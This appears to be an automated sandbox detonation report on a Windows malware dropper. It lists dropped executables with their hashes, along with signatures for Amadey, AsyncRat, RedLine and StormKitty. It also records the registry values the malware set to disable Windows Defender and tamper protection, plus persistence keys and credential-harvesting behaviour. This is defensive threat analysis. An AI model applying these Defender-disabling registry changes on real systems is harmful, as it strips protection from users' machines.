memory/1672-95-0x0000000001FB0000-0x0000000001FC8000-memory.dmp

memory/1672-96-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-97-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-99-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-101-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-103-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-105-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-107-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-111-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-109-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-113-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-117-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-115-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-119-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-123-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-121-0x0000000001FB0000-0x0000000001FC3000-memory.dmp

memory/1672-124-0x0000000004A80000-0x0000000004AC0000-memory.dmp

memory/1672-125-0x0000000004A80000-0x0000000004AC0000-memory.dmp

memory/1672-126-0x0000000004A80000-0x0000000004AC0000-memory.dmp

memory/1672-127-0x0000000004A80000-0x0000000004AC0000-memory.dmp

memory/1672-128-0x0000000004A80000-0x0000000004AC0000-memory.dmp

memory/1672-129-0x0000000004A80000-0x0000000004AC0000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

MD5 72627a85c40f3bdaf6b6b451f742f1e9
SHA1 44a15ee128d050db7dca4884f1ccd2f584d7915e
SHA256 fff90eff8d06d499e00aedf10eb72330db25202b7bc1d1bb9f2cafda8bd8a5b7
SHA512 6ea7124b57cd1786b38a109144c51f2c0d5ca6d1821d30a208d53598ee0d9053f3c3bba6c2ec6ef288d2d8c45b751001590abb033ead29b2803e462dbd0b4eed

\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

MD5 72627a85c40f3bdaf6b6b451f742f1e9
SHA1 44a15ee128d050db7dca4884f1ccd2f584d7915e
SHA256 fff90eff8d06d499e00aedf10eb72330db25202b7bc1d1bb9f2cafda8bd8a5b7
SHA512 6ea7124b57cd1786b38a109144c51f2c0d5ca6d1821d30a208d53598ee0d9053f3c3bba6c2ec6ef288d2d8c45b751001590abb033ead29b2803e462dbd0b4eed

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

MD5 72627a85c40f3bdaf6b6b451f742f1e9
SHA1 44a15ee128d050db7dca4884f1ccd2f584d7915e
SHA256 fff90eff8d06d499e00aedf10eb72330db25202b7bc1d1bb9f2cafda8bd8a5b7
SHA512 6ea7124b57cd1786b38a109144c51f2c0d5ca6d1821d30a208d53598ee0d9053f3c3bba6c2ec6ef288d2d8c45b751001590abb033ead29b2803e462dbd0b4eed

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

MD5 72627a85c40f3bdaf6b6b451f742f1e9
SHA1 44a15ee128d050db7dca4884f1ccd2f584d7915e
SHA256 fff90eff8d06d499e00aedf10eb72330db25202b7bc1d1bb9f2cafda8bd8a5b7
SHA512 6ea7124b57cd1786b38a109144c51f2c0d5ca6d1821d30a208d53598ee0d9053f3c3bba6c2ec6ef288d2d8c45b751001590abb033ead29b2803e462dbd0b4eed

\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

MD5 72627a85c40f3bdaf6b6b451f742f1e9
SHA1 44a15ee128d050db7dca4884f1ccd2f584d7915e
SHA256 fff90eff8d06d499e00aedf10eb72330db25202b7bc1d1bb9f2cafda8bd8a5b7
SHA512 6ea7124b57cd1786b38a109144c51f2c0d5ca6d1821d30a208d53598ee0d9053f3c3bba6c2ec6ef288d2d8c45b751001590abb033ead29b2803e462dbd0b4eed

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe

MD5 72627a85c40f3bdaf6b6b451f742f1e9
SHA1 44a15ee128d050db7dca4884f1ccd2f584d7915e
SHA256 fff90eff8d06d499e00aedf10eb72330db25202b7bc1d1bb9f2cafda8bd8a5b7
SHA512 6ea7124b57cd1786b38a109144c51f2c0d5ca6d1821d30a208d53598ee0d9053f3c3bba6c2ec6ef288d2d8c45b751001590abb033ead29b2803e462dbd0b4eed

memory/1944-140-0x00000000005B0000-0x00000000005CA000-memory.dmp

memory/1944-141-0x0000000000B40000-0x0000000000B58000-memory.dmp

memory/1944-142-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-143-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-145-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-147-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-149-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-151-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-153-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-155-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-157-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-159-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-161-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-163-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-165-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-167-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-169-0x0000000000B40000-0x0000000000B52000-memory.dmp

memory/1944-170-0x0000000000240000-0x000000000026D000-memory.dmp

memory/1944-171-0x0000000004BC0000-0x0000000004C00000-memory.dmp

memory/1944-172-0x0000000004BC0000-0x0000000004C00000-memory.dmp

memory/1944-173-0x0000000004BC0000-0x0000000004C00000-memory.dmp

memory/1944-174-0x0000000000400000-0x0000000000466000-memory.dmp

memory/1944-175-0x0000000004BC0000-0x0000000004C00000-memory.dmp

memory/1944-176-0x0000000004BC0000-0x0000000004C00000-memory.dmp

memory/1944-177-0x0000000004BC0000-0x0000000004C00000-memory.dmp

memory/1944-179-0x0000000000400000-0x0000000000466000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

memory/1608-186-0x00000000009D0000-0x00000000009D1000-memory.dmp

\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe

MD5 e05249b60272a0a33974a9cf62a06a6c
SHA1 75c7ea58f69bc67d073375f5a23f7438ec78004b
SHA256 c65feb2de5a8c5960ee2ceab10f5a47623a88a62f07d958206fd8c4e41077068
SHA512 ce4df9d8cca820e37054d9081f79d6076887d13eac97f30da762d436b7acf28688523350d47cee5fc69d65b6cba90e3c0426745b7c473f8ade574fbb491f80ad

\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe

MD5 ca0980a62c6480dabf9d26117d623f05
SHA1 bb95dde6ee8b8dfa0852c0f32f3ff2fa35637f63
SHA256 5071c97190248e4dd42b8869cddbfcaffaccd1a9cabd14cb38e1390fd2560995
SHA512 3ae147f7c1de10e180da5d79c36a4f14c2086bdcbcb2f40bde279f6067a66859e67fead3d898a36f8ff31261bd9e6eae1a2a4199a62cc79840d2a83d67ec248b

memory/1636-207-0x0000000001E70000-0x0000000001EAC000-memory.dmp

memory/1636-208-0x0000000001ED0000-0x0000000001F0A000-memory.dmp

memory/1636-210-0x0000000001ED0000-0x0000000001F05000-memory.dmp

memory/1636-212-0x0000000001ED0000-0x0000000001F05000-memory.dmp

memory/1636-209-0x0000000001ED0000-0x0000000001F05000-memory.dmp

memory/1636-745-0x00000000007E0000-0x0000000000826000-memory.dmp

memory/1636-747-0x0000000002170000-0x00000000021B0000-memory.dmp

memory/1636-749-0x0000000002170000-0x00000000021B0000-memory.dmp

memory/1636-751-0x0000000002170000-0x00000000021B0000-memory.dmp

memory/1636-1005-0x0000000002170000-0x00000000021B0000-memory.dmp

memory/1636-1007-0x0000000002170000-0x00000000021B0000-memory.dmp

memory/1636-1009-0x0000000002170000-0x00000000021B0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-06 21:59

Reported

2023-05-06 23:39

Platform

win10v2004-20230220-en

Max time kernel

153s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe"

Signatures

Amadey

trojan amadey

AsyncRat

rat asyncrat

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A

RedLine

infostealer redline

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation C:\ProgramData\07900588628047328197.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w01PN11.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\5cb6818d6c\oneetx.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
Key value queried \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation C:\ProgramData\46777832471797123856.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\za670495.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\5573a3d76553db4d4d4aba4f2706bc4ed75ffd3ffb934896b38096a741dc75b4.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\za786024.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\za152989.exe N/A

Checks installed software on the system

discovery

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini C:\Windows\system32\svchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3060 set thread context of 4300 N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif
PID 1028 set thread context of 1036 N/A C:\ProgramData\07900588628047328197.exe C:\ProgramData\07900588628047328197.exe

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\svchost.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4238149048-355649189-894321705-1000\{A6B3229E-0612-46BD-8EFC-4BD6478802EE} C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-4238149048-355649189-894321705-1000\{5F21EE14-2C92-4D6A-9A4D-018D5E9FD34D} C:\Windows\system32\svchost.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\smzntdjf.xp4\29190\Bondage.exe.pif N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\07900588628047328197.exe N/A
N/A N/A C:\ProgramData\07900588628047328197.exe N/A
N/A N/A C:\ProgramData\07900588628047328197.exe N/A
N/A N/A C:\ProgramData\07900588628047328197.exe N/A
N/A N/A C:\ProgramData\07900588628047328197.exe N/A
N/A N/A C:\ProgramData\07900588628047328197.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\49849443.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\u87253422.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xUqiw01.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\07900588628047328197.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\07900588628047328197.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\ProgramData\46777832471797123856.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
